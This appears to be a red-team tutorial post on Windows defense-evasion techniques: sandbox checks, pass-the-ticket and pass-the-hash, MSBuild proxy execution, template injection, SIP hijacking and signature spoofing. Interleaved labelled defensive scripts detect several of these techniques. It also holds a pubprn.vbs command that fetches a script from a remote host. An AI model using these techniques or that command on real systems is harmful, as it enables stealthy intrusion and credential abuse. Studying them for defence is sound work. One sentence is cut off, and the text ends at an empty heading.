
Pentest Red Team Techniques - Defense Evasion

dEEpEst


Defense Evasion

The adversary is trying to avoid being detected.

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries may also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics' techniques are cross-listed here when those techniques include the added benefit of subverting defenses.
 

Virtualization/Sandbox Evasion

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Adversaries may use several methods to accomplish Virtualization/Sandbox Evasion, such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if they are in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.
 

Time Based Evasion

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.

Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: Scheduled Task/Job). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled Multi-Stage Channels to avoid analysis and scrutiny.

Example

Ok so I won't put an example on this one, but I will point you to an article that is great in explaining a recent attack (SolarWinds) as of the time of writing this. In short, what happened here is the malware waited for 2 weeks!! before executing and running its malicious code to evade defenses: a legitimate software running normally without making any malicious connections immediately like many others, this one actually waited for 2 weeks. Take a good read at what happened, as this one is great; just as mentioned before, Tasks/Jobs are good for this demo.


 

User Activity Based Checks

Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks, browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro or waiting for a user to double click on an embedded image to activate.

Example

In this example we will be working with user permissions only; of course we can grab more activity like logs and registry info, but these will require more elevated permissions. From here we will just make sure the user has files in their Documents folder, something above 10 files, so we know that it is a legitimate active user and not a recently created one in a virtual environment only used for debuggers.

image

Above you see the code used in PowerShell to find the count of how many files are in the Documents directory. If the count is above 8 then it will print out OK, but if not then a simple NOPE will run instead.

image

We see above that we have 8 files in the Documents directory, just to verify this, so now by executing our script it should just print NOPE.

image

Exactly as intended. This is another good method to evade systems, as we verify whether this is an actual working and active user in an environment that has working files, or is at least active in a working environment folder; Documents, Downloads and Pictures are very common for employees.
 

System Checks

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Specific checks will vary based on the target and/or adversary, but may involve behaviors such as Windows Management Instrumentation, PowerShell, System Information Discovery, and Query Registry to obtain system information and search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.

Checks could include generic system properties such as uptime and samples of network traffic. Adversaries may also check the network adapter addresses, CPU core count, and available memory/drive size.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions. In applications like VMware, adversaries can also use a special I/O port to send commands and receive output.

Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative of a virtual environment. Adversaries may also query for specific readings from these devices.

Example

In the following sample I will demonstrate a simple bat file that an adversary may create to do a simple system check: if it finds a specific string, VirtualBox, it will terminate its execution, but if not then it will continue and execute the malicious code.

image

Above you can see the simple scripting code. It will first run the systeminfo command to grab all the information of the PC, save the info to a file, and then use the findstr command to search for certain strings, in this case VirtualBox. Then, by using if/else, if the string is found it will NOT execute, but if not found it will continue its execution.

In the demo here you can see that it searches for the VirtualBox string. This technique can be extended to finding programs like debuggers or hardware to stop the execution of the script. This is a simple demo of how these techniques can be pushed to find even more checks and be aware that we aren't running in a virtual environment.

Demo-SystemCheck:

image
 

Use Alternate Authentication Material

Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.

Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.

Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication material allows the system to verify an identity has successfully
 

Pass the Ticket

Adversaries may 'pass the ticket' using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the Ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

In this technique, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.

Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).

Golden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.

Example

This demonstration will also cover Silver Tickets

Now in this scenario we have a share inaccessible by the domain user that we currently hold, DC\Dwinchester. But we are aware of another user that can access it.

Jwinchester, this being since the user is part of the Data Engineers group.

image

image

And that folder has permissions for that user. We can see that our current user has no permissions to even check the permissions themselves.

image

Since it's a DB folder we try to search for a user that has DB permissions; we already know this with Jwinchester.

image

John is the perfect candidate, now let's get a ticket for this account. We will use a tool to grab SPNs

image

And Request the Ticket

image

We will then export the tickets and crack them offline. Crack the ticket and convert it to an NTLM hash; for demo purposes this is already done.

image

Create the Silver Ticket

image

And remember the share we had no access to? We can now enumerate the files on the share.

image

 

Pass the Hash

Adversaries may "pass the hash" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.

Example

Let's start by showing why this is a great technique for Defense Evasion: the most secure thing available is at the boot-up of the screen.

image

Now how can we avoid this part without having the cleartext password of the user, and avoiding any login screens and prompts, all the good stuff that might give us away?

By passing the hash. This is a great technique that will authenticate silently, and even when creating a log it will throw a log with ID 4624.

In this demo we will use PsExec; it's great for this sample and it allows authentication with hashes. (You must already have a hash here, be creative: mimikatz, crackmap, lsassy.)

PsExec

image

In the above image the authentication using hashes has been successful. Be wary that there are some requirements for this to work, for example a share with administrative access has to be available and the LocalAccountTokenPolicy registry key needs to be set to a value of 1.

This topic is very extensive and there are many tools that can help with this CrackMapExec, SMBExec, WmiExec, Lsassy.

And others; do please try and experiment and see what is being left behind, maybe a file? a log? When we use PsExec from Sysinternals it leaves a registry key when accepting the EULA, but what about PsExec.py?
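What such a PtH logon looks like to the defender, as an added example that is not part of the original post: the post notes that PsExec-style hash authentication still produces a 4624 event and depends on the LocalAccountTokenFilterPolicy value (called LocalAccountTokenPolicy above). The script below triages constructed 4624 records for NTLM network logons, RID 500 local accounts and that policy; host and domain names are assumed.

```python
"""Triage Windows Security 4624 logon events for pass-the-hash activity.

Added example, not from the original post. A PtH session opened by
PsExec-style tools over SMB appears as a network logon (LogonType 3)
authenticated by the NTLM package (LogonProcessName NtLmSsp). Records
below are constructed; attribute names mirror the 4624 event's fields
(TargetUserName, TargetDomainName, TargetUserSid, LogonType,
AuthenticationPackageName, LogonProcessName, WorkstationName, IpAddress).
token_filter_policy is the LocalAccountTokenFilterPolicy DWORD under
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System.
"""
from dataclasses import dataclass


@dataclass
class Logon4624:
    target_user: str
    target_domain: str
    target_sid: str
    logon_type: int
    auth_package: str    # "NTLM" or "Kerberos"
    logon_process: str   # "NtLmSsp", "Kerberos", "User32", ...
    workstation: str     # WorkstationName; empty when the client sends none
    ip_address: str      # IpAddress of the remote end, "-" for local logons


def is_ntlm_network_logon(ev: Logon4624) -> bool:
    """Network logon authenticated with NTLM rather than Kerberos."""
    return (ev.logon_type == 3
            and ev.auth_package.upper() == "NTLM"
            and ev.logon_process.lower() == "ntlmssp")


def pth_indicators(ev: Logon4624, host_name: str, domain_name: str,
                   token_filter_policy: int = 0) -> list:
    """Return the reasons an event looks like pass-the-hash (empty if none).

    host_name: NetBIOS name of the machine that logged the event.
    domain_name: NetBIOS name of the AD domain that machine belongs to.
    """
    reasons = []
    if not is_ntlm_network_logon(ev):
        return reasons
    domain = ev.target_domain.upper()
    if domain == domain_name.upper():
        # Inside a Kerberos domain a domain account normally presents a
        # ticket; NTLM means the client chose (or only had) the hash.
        reasons.append("domain account used NTLM for a network logon")
    elif domain == host_name.upper():
        reasons.append("local account used over the network")
        if ev.target_sid.endswith("-500"):
            # The built-in Administrator keeps a full token remotely even
            # with default UAC remote restrictions (the RID 500 case above).
            reasons.append("RID 500 built-in Administrator")
        elif token_filter_policy == 1:
            reasons.append("LocalAccountTokenFilterPolicy=1 grants other local "
                           "admins an unfiltered token remotely")
    if not ev.workstation or ev.workstation == "-":
        reasons.append("client sent no workstation name")
    return reasons


def triage(events, host_name, domain_name, token_filter_policy=0):
    """Map each suspicious DOMAIN\\user@ip to the reasons it was flagged."""
    hits = {}
    for ev in events:
        reasons = pth_indicators(ev, host_name, domain_name, token_filter_policy)
        if reasons:
            hits[f"{ev.target_domain}\\{ev.target_user}@{ev.ip_address}"] = reasons
    return hits


# Constructed sample: three logons recorded on workstation WS01 in domain DC.
SAMPLE_EVENTS = [
    # normal Kerberos network logon from a file-share client
    Logon4624("Dwinchester", "DC", "S-1-5-21-1111-2222-3333-1105", 3,
              "Kerberos", "Kerberos", "WS02", "10.0.0.12"),
    # PsExec-style SMB logon with the local Administrator's hash
    Logon4624("Administrator", "WS01", "S-1-5-21-4444-5555-6666-500", 3,
              "NTLM", "NtLmSsp", "", "10.0.0.50"),
    # interactive console logon: not a network logon, ignored
    Logon4624("Jwinchester", "DC", "S-1-5-21-1111-2222-3333-1107", 2,
              "Negotiate", "User32", "WS01", "-"),
]

if __name__ == "__main__":
    for account, reasons in triage(SAMPLE_EVENTS, "WS01", "DC").items():
        print(account, "->", "; ".join(reasons))
```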

 

Trusted Developer Utilities Proxy Execution

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.
 

MSBuild

Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.

Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file. MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.

Example

In this demo MSBuild is a proper tool for executing code, specially C# inserted in an XML project file. MSBuild will compile and execute the inline task.

By searching for the binary in its path or using the Developer Command Prompt we can execute the payload by passing the full path as a parameter. In this demo the payload is on the target machine for demonstration purposes; the utility is proxy aware, so a payload can be called from a remote host.

image

We see the execution and let's verify a shell

image

We view from Process Explorer that MSBuild is a child process and being called

image

But from Procmon we also see the files it calls and the connections that are being made

image

One of the good things of MSBuild is that it cleans up after the connection is closed.

image

This is good for OPSEC, but still be aware that a file is still created and touches disk, a TEMP file, but still some forensic evidence.

Demo

image
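How a defender can inspect a project file that MSBuild.exe was seen launching, as an added example that is not the post's code: the inline-task feature the section describes is a UsingTask element with a CodeTaskFactory (or RoslynCodeTaskFactory) and a Code child that MSBuild compiles and runs. The sample project and the API watch list are constructed assumptions.

```python
"""Find inline tasks in MSBuild project files.

Added example, not from the original post. A UsingTask whose TaskFactory
is CodeTaskFactory or RoslynCodeTaskFactory carries source in a Code
element that MSBuild.exe compiles and executes when a Target invokes the
task. The sample project below is constructed; the watch list of API
names is an assumed starting point, not an exhaustive signature set.
"""
import xml.etree.ElementTree as ET

INLINE_FACTORIES = {"codetaskfactory", "roslyncodetaskfactory"}
# Assumed watch list: fragments that rarely belong in a build script.
WATCH_LIST = ("System.Diagnostics.Process", "DllImport", "VirtualAlloc",
              "Assembly.Load", "System.Net.WebClient", "Marshal.Copy")


def local_name(tag: str) -> str:
    """Strip the MSBuild 2003 namespace (SDK-style projects have none)."""
    return tag.split("}", 1)[1] if "}" in tag else tag


def inline_tasks(project_xml: str) -> list:
    """Return one dict per inline task: name, factory, language, type, flagged APIs."""
    root = ET.fromstring(project_xml)
    tasks = []
    for el in root.iter():
        if local_name(el.tag) != "UsingTask":
            continue
        factory = el.get("TaskFactory", "")
        if factory.lower() not in INLINE_FACTORIES:
            continue
        for code in el.iter():
            if local_name(code.tag) != "Code":
                continue
            body = code.text or ""
            tasks.append({
                "name": el.get("TaskName", ""),
                "factory": factory,
                "language": code.get("Language", "cs"),
                "type": code.get("Type", "Fragment"),
                "flagged": [w for w in WATCH_LIST if w in body],
            })
    return tasks


def targets_invoking(project_xml: str, task_name: str) -> list:
    """Names of Target elements that call the task (where its code would run)."""
    root = ET.fromstring(project_xml)
    names = []
    for target in root.iter():
        if local_name(target.tag) != "Target":
            continue
        if any(local_name(child.tag) == task_name for child in target):
            names.append(target.get("Name", ""))
    return names


# Constructed sample: an ordinary compile step plus an inline task that the
# Build target invokes. The C# body is inert and only exists to be scanned.
SAMPLE_PROJECT = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <Csc Sources="app.cs" OutputAssembly="app.exe" />
    <Hello />
  </Target>
  <UsingTask TaskName="Hello" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Fragment" Language="cs"><![CDATA[
        var p = new System.Diagnostics.Process();
        Console.WriteLine("constructed sample, does nothing");
      ]]></Code>
    </Task>
  </UsingTask>
</Project>
"""

if __name__ == "__main__":
    for task in inline_tasks(SAMPLE_PROJECT):
        where = targets_invoking(SAMPLE_PROJECT, task["name"])
        print(task["name"], task["factory"], task["language"],
              "flagged:", task["flagged"], "invoked by:", where)
```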
 

Template Injection

Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft's Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, .xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives composed of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.

Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.

Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.

This technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.

Example

For this demo we now create a docx file that will try and reach out to our attacking machine from a remote source. The easiest way to do this is to create a doc document from one of the provided Word templates and just modify the target.

image

Now we will just need to modify the document to accommodate it to our phishing needs. With the release of Office 2007, Microsoft introduced formats that end with the 'x' character; each of these formats is just a zip file containing mostly .xml and .rels files. We are going to manually edit these properly and then zip them back together.

image

Once unzipped we will navigate to the word >> _rels >> settings.xml file and search for the Target value.

image

We edit it to point to our remote host.

image

Once the file is being loaded you will notice it's trying to reach out to our remote host

image

I set responder to be listening for any traffic

image

Note:

OK so I was trying to unzip the files but was getting errors that the file was damaged, so to get around this all I did was drag and drop the payload into the normal file just to replace the document; instead of unzipping the file, all I did was rename it to ZIP so I could access the XML files.


image

In the upper image I just dragged and dropped the upper file into the bottom window and renamed it back to docx WITHOUT the unzipping.

Demo:


image
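The same edit seen from the defender's side, as an added example that is not part of the original post: the Target the demo changes lives in the relationship part word/_rels/settings.xml.rels, and a scanner can open the docx as a zip and flag any relationship whose TargetMode is External and whose target points at a remote or UNC location. The sample documents are built in memory; the 192.0.2.x address is a documentation range, not a real host.

```python
"""Scan an OOXML document for injected external template references.

Added example, not from the original post. Word fetches the attached
template named in word/_rels/settings.xml.rels when the document opens;
a relationship with TargetMode="External" and an http(s) or UNC target is
the artifact the section describes. The .docx files built here are
constructed and contain only the parts the scan needs.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = f"{{{RELS_NS}}}Relationship"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")


def external_relationships(doc_bytes: bytes) -> list:
    """Return (part_name, relationship_type, target) for every external relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode", "Internal") == "External":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found


def target_risk(target: str) -> str:
    """Classify where an external target would make Office reach out to."""
    t = target.strip()
    if t.startswith("\\\\") or t.lower().startswith("file:"):
        return "unc"        # SMB fetch: template load plus an NTLM authentication attempt
    scheme = urlparse(t).scheme.lower()
    if scheme in ("http", "https", "ftp"):
        return "remote"     # template fetched over the network when the file opens
    return "local"          # relative or drive path, no network reach-out


def scan_document(doc_bytes: bytes) -> list:
    """Return findings as dicts; an empty list means no external reference of concern."""
    findings = []
    for part, rel_type, target in external_relationships(doc_bytes):
        risk = target_risk(target)
        if rel_type == ATTACHED_TEMPLATE and risk != "local":
            findings.append({"part": part, "target": target, "risk": risk,
                             "reason": "attached template is fetched from a remote location"})
        elif risk == "unc":
            findings.append({"part": part, "target": target, "risk": risk,
                             "reason": "UNC target in a relationship (possible forced authentication)"})
    return findings


def build_sample_docx(template_target=None) -> bytes:
    """Constructed minimal .docx; pass None for a document with no external template."""
    rels = (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{RELS_NS}">')
    if template_target is not None:
        rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                 f'Target="{template_target}" TargetMode="External"/>')
    rels += "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        pkg.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        pkg.writestr("word/settings.xml", '<?xml version="1.0"?><settings/>')
        pkg.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


INJECTED_DOCX = build_sample_docx("http://192.0.2.10/template.dotm")
CLEAN_DOCX = build_sample_docx(None)

if __name__ == "__main__":
    for f in scan_document(INJECTED_DOCX):
        print(f["part"], f["risk"], f["target"], "-", f["reason"])
```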

 

Subvert Trust Controls

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.

Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct File and Directory Permissions Modification or Modify Registry in support of subverting these controls. Adversaries may also create or steal code signing certificates to acquire trust on target systems.
 

SIP and Trust Provider Hijacking

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature.

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) to provide a layer of abstraction between API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all) and are identified by globally unique identifiers (GUIDs).

Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimate signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools into classifying malicious (or any) code as signed by:

· Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP's CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file's real signature, an adversary can apply an acceptable signature value to all files using that SIP (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).

· Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP's CryptSIPDllVerifyIndirectData function, which validates a file's computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.

· Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider's FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking a SIP's CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).

· Note: The above hijacks are also possible without modifying the Registry, via DLL search order hijacking.

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.
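A baseline check for the three registry locations listed above, as an added example that is not part of the original post: it parses a dump in the layout printed by "reg query <key> /s" and compares every CryptSIPDllGetSignedDataMsg, CryptSIPDllVerifyIndirectData and Trust\FinalPolicy entry against known-good DLL and function names. The baseline covers the Portable Executable SIP and the Authenticode trust provider as captured from a clean Windows 10 host and is an assumption to re-verify against your own reference image; the registry dump is constructed.

```python
"""Audit SIP and trust-provider registry values for hijacked DLL/function pointers.

Added example, not from the original post. Input is text in the layout
"reg query <key> /s" prints on Windows. BASELINE maps each SIP or trust
provider GUID to the DLL file name and exported function expected for
that value family; it was captured from a clean Windows 10 host and must
be re-captured from your own reference image before use. The dump below
is constructed and contains one hijacked CryptSIPDllVerifyIndirectData
entry of the kind the section describes.
"""
import ntpath
import re

# value family -> GUID -> (expected DLL file name, expected exported function)
BASELINE = {
    "CryptSIPDllGetSignedDataMsg": {
        "{C689AAB8-8E78-11D0-8C47-00C04FC295EE}": ("WINTRUST.DLL", "CryptSIPGetSignedDataMsg"),
    },
    "CryptSIPDllVerifyIndirectData": {
        "{C689AAB8-8E78-11D0-8C47-00C04FC295EE}": ("WINTRUST.DLL", "CryptSIPVerifyIndirectData"),
    },
    "FinalPolicy": {
        "{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}": ("WINTRUST.DLL", "SoftpubAuthenticode"),
    },
}
TRUSTED_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")
KEY_RE = re.compile(r"\\(CryptSIPDllGetSignedDataMsg|CryptSIPDllVerifyIndirectData|FinalPolicy)"
                    r"\\(\{[0-9A-F-]+\})$", re.I)


def parse_reg_query(text: str) -> dict:
    """Map each key path to {value_name: data}; value lines are indented by four spaces."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
        elif current and line.startswith("    "):
            parts = line.split(None, 2)            # name, REG_* type, data
            if len(parts) == 3:
                # "$DLL"/"$Function" (trust providers) and "Dll"/"FuncName" (SIPs)
                keys[current][parts[0].lstrip("$").lower()] = parts[2].strip()
    return keys


def audit(text: str) -> list:
    """Return (key, problem) pairs for entries that deviate from the baseline."""
    problems = []
    for key, values in parse_reg_query(text).items():
        m = KEY_RE.search(key)
        if not m:
            continue
        family = next(f for f in BASELINE if f.lower() == m.group(1).lower())
        guid = m.group(2).upper()
        dll = values.get("dll", "")
        func = values.get("funcname") or values.get("function", "")
        expected = BASELINE[family].get(guid)
        if expected is None:
            problems.append((key, f"GUID not in baseline for {family}; verify manually"))
            continue
        exp_dll, exp_func = expected
        if ntpath.basename(dll).upper() != exp_dll.upper():
            problems.append((key, f"Dll is {dll!r}, expected {exp_dll}"))
        directory = ntpath.dirname(dll).lower()
        if directory and not directory.startswith(TRUSTED_DIRS):
            problems.append((key, f"Dll loaded from untrusted directory {directory!r}"))
        if func != exp_func:
            problems.append((key, f"function is {func!r}, expected {exp_func}"))
    return problems


# Constructed dump: clean GetSignedDataMsg and FinalPolicy entries, and a
# VerifyIndirectData entry redirected to a DLL outside System32 (placeholder names).
SAMPLE_DUMP = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}
    Dll    REG_SZ    C:\Windows\System32\WINTRUST.DLL
    FuncName    REG_SZ    CryptSIPGetSignedDataMsg

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}
    Dll    REG_SZ    C:\Users\Public\hijack.dll
    FuncName    REG_SZ    AlwaysVerify

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}
    $DLL    REG_SZ    C:\Windows\System32\WINTRUST.DLL
    $Function    REG_SZ    SoftpubAuthenticode
"""

if __name__ == "__main__":
    for key, problem in audit(SAMPLE_DUMP):
        print(key.rsplit("\\", 2)[-2], "->", problem)
```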
 

Code Signing

Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificate used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature, this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform.

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

Example

CarbonCopy is a tool built by paranoidninja for spoofing digital signatures. Signatures like these can actually bypass AV and pass undetected by analysts because they provide a level of authenticity. See 2 payloads, with and without a digital signature.

image

Now we will check out the digitally signed one a little more to see what it contains.

image

The digital signature is not installed, of course; this is why we see that it cannot be verified.

image

We have the option to install this certificate, of course with proper permissions, but here I am just trying to demonstrate how this "Signature" can provide some level of authenticity since it is signed by Microsoft; of course a solid analyst can see that this has been valid from a recent date. So how can we build this digitally signed binary? With CarbonCopy.

image

Above we see a successfully spoofed signature. The requirements for this are very simple: the website whose signature we are trying to spoof, the port, the target payload and an output file.

You will also need the osslsigncode tool to be installed.

 

Signed Script Proxy Execution

Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.

PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site. An example command is

cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

Example

Could not replicate; I wasn't receiving errors and could find the payload I was pointing at, if any suggestions.


image

 

Signed Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.
 

Compiled HTML File

